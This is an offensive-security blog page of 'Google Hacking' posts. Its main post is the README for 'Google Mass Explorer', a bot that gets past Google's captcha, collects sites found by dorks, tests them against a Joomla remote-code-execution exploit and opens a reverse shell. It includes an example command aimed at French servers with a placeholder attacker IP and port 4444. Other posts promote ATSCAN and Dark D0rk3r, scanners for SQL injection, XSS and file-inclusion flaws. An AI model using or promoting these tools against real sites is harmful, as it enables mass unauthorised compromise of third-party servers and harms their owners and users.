Security of Information, Threat Intelligence, Hacking, Offensive Security, Pentest, Open Source, Hackers Tools, Leaks, Pr1v8, Premium Courses Free, etc

  • Penetration Testing Distribution - BackBox

    BackBox is a penetration test and security assessment oriented Ubuntu-based Linux distribution providing a network and informatic systems analysis toolkit. It includes a complete set of tools required for ethical hacking and security testing...
  • Pentest Distro Linux - Weakerth4n

    Weakerth4n is a penetration testing distribution which is built from Debian Squeeze.For the desktop environment it uses Fluxbox...
  • The Amnesic Incognito Live System - Tails

    Tails is a live system that aims to preserve your privacy and anonymity. It helps you to use the Internet anonymously and circumvent censorship...
  • Penetration Testing Distribution - BlackArch

    BlackArch is a penetration testing distribution based on Arch Linux that provides a large amount of cyber security tools. It is an open-source distro created specially for penetration testers and security researchers...
  • The Best Penetration Testing Distribution - Kali Linux

    Kali Linux is a Debian-based distribution for digital forensics and penetration testing, developed and maintained by Offensive Security. Mati Aharoni and Devon Kearns rewrote BackTrack...
  • Friendly OS designed for Pentesting - ParrotOS

    Parrot Security OS is a cloud friendly operating system designed for Pentesting, Computer Forensic, Reverse engineering, Hacking, Cloud pentesting...
Showing posts with label Google Hacking. Show all posts
Showing posts with label Google Hacking. Show all posts

Monday, December 12, 2016

Google Mass Explorer - Google Explorer



[+] Google Mass Explorer

This is a automated robot for google search engine.
Make a google search, and parse the results for a especific exploit you define. The options can be listed with --help parameter.


Intro:
This project is a main project that i will keep upgrading when new exploits are published. They idea is use google search engine to find vulnerable targets, for specific exploits. The exploits parsers will be concentrated in google_parsers module. So when you make a search, you can choose explicit in "--exploit parser" argument, a especific exploit to the robot test if is the targets are vulnerable for that or not.
** !!! Is very important you use the right dork for the specific exploit.
The google parsers module (google_parsers.py) is the file that i will keep upgrading. For this version i'm putting just the joomla cve exploit. I have a wordpress bot too, but the ideia is you make your own parsers =))) If you have difficul to make, just send me the exploit and we make together =))
I make this google explorer because i'm very busy, and take to much time to search for targets in google manually. So I use a automated framework (Selenium) to make a robot to search for targets for me ;)) The problem using other libs and modules, is the captcha from google, and using Selenium, you can type the captcha when it is displayed, and the robots keeps crawling with no problem =)) This was the only way i find out to "bypass" this kind of protection... After it work, i decide to publish to everyone.

How the robot works:
1 - Make a google search
2 - Parse the from each page results
3 - Test if each target is vulnerable for a specific exploit.

Requiriments:
!!!!!! PYTHON 3 !!!!!!
The requirements is in requirements.txt file, you should install what is listed on it with:
$ sudo pip install -r requirements.txt
These are some exemples that you can use, and make your own:
python3 google_explorer.py --dork="site:*.com inurl:index.php?option=" --browser="chrome" --exploit_parser="joomla_15_12_2015_rce" --revshell="MY_PUBLIC_IP" --port=4444 --google_domain="google.com" --location="França" --last_update="no último mês"
On this exemple, im looking for servers in France, vulnerables to joomla RCE, using google.com domain as google search (they are listed in google_doomais.txt file), with last update on last month.
All these options are possible to any language, it will depends only in what google use for syntax for your country..
I have some old videos on my channel on youtube showing how it works, so take a look at the description of the olders projects in github if you need some video exemples ;))

Usage:
google_explorer.py --dork=<arg> --browser=<arg> [--exploit_parser=<arg>] [--language=<arg>]
[--location=<arg>] [--last_update=<arg>]
[--revshell=<arg>] [--port=<arg>]
[--google_domain=<arg>]

google_explorer.py --help
google_explorer.py --version
Options:
-h --help                                Open help menu
-v --version Show version
Required options:
--dork='google dork'                     your favorite g00gle dork :)
--browser='browser' chrome
chromium
Optional options:
--language='page language'               Portuguese
English
Arabic
Romanian
...
...

--location='server location' Brazil
Mauritania
Tunisia
Marroco
Japan
...
...

--last_update='page last update' anytime
past 24 hours
past week
past month
past year

--exploit_parser='Name or CVE exploit' joomla_15_12_2015_rce
generic_parser

--revshell='IP' public ip for reverse shell
--port='PORT' port for back connect

--google_domain='google domain' google domain to use on search. Ex: google.co.uk

Share:

Friday, February 5, 2016

Ebook's - Google Hacking Pack



Google Hacking

Google hacking involves using advanced operators in the Google search engine to locate specific strings of text within search results. Some of the more popular examples are finding specific versions of vulnerable Web applications. The following search query would locate all web pages that have that particular text contained within them. It is normal for default installations of applications to include their running version in every page they serve, for example, "Powered by XOOPS 2.2.3 Final".



Share:

Friday, January 22, 2016

Python Script Searching - Dark D0rk3r




Dark D0rk3r

Dark D0rk3r is a python script that performs dork searching and searches for local file inclusion and SQL injection errors.




Share:

Wednesday, January 6, 2016

ATSCAN - Server, Site and Dork Scanner




Description:

  • ATSCAN Version 2 
  • Dork scanner. 
  • XSS scanner. 
  • Sqlmap. 
  • LFI scanner.
  • Filter wordpress and Joomla sites in the server. 
  • Find Admin page.
  • Decode / Encode MD5 + Base64. 

Libreries to install:

ap-get install libxml-simple-perl
NOTE: Works in linux platforms.

Permissions & Executution:

$chmod +x atscan.pl 
perl ./atscan.pl

Screenshots: 






Share:

Monday, August 31, 2015

Google Hacking Dork List SQL


Algumas Dorks para Google Hacking SQL

Google Hacking Dork SQL

By Offensive Sec
Share:

Google Hacking Dorks RFI



Algumas Dorks Para Google Hacking RFI

Google Hacking Dorks RFI

By Offensive Sec
Share:

Google Hacking Dorks LFI



Algumas Dorks para Google Hacking LFI

Google Hacking Dorks LFI

By Offensive Sec
Share:

Google Hacking Dork List XSS




Algumas dorks para google hacking XSS

Google Hacking Dork XSS


By Offensive Sec
Share:
Copyright © Offensive Sec Blog | Powered by OffensiveSec
Design by OffSec | Theme by Nasa Records | Distributed By Pirate Edition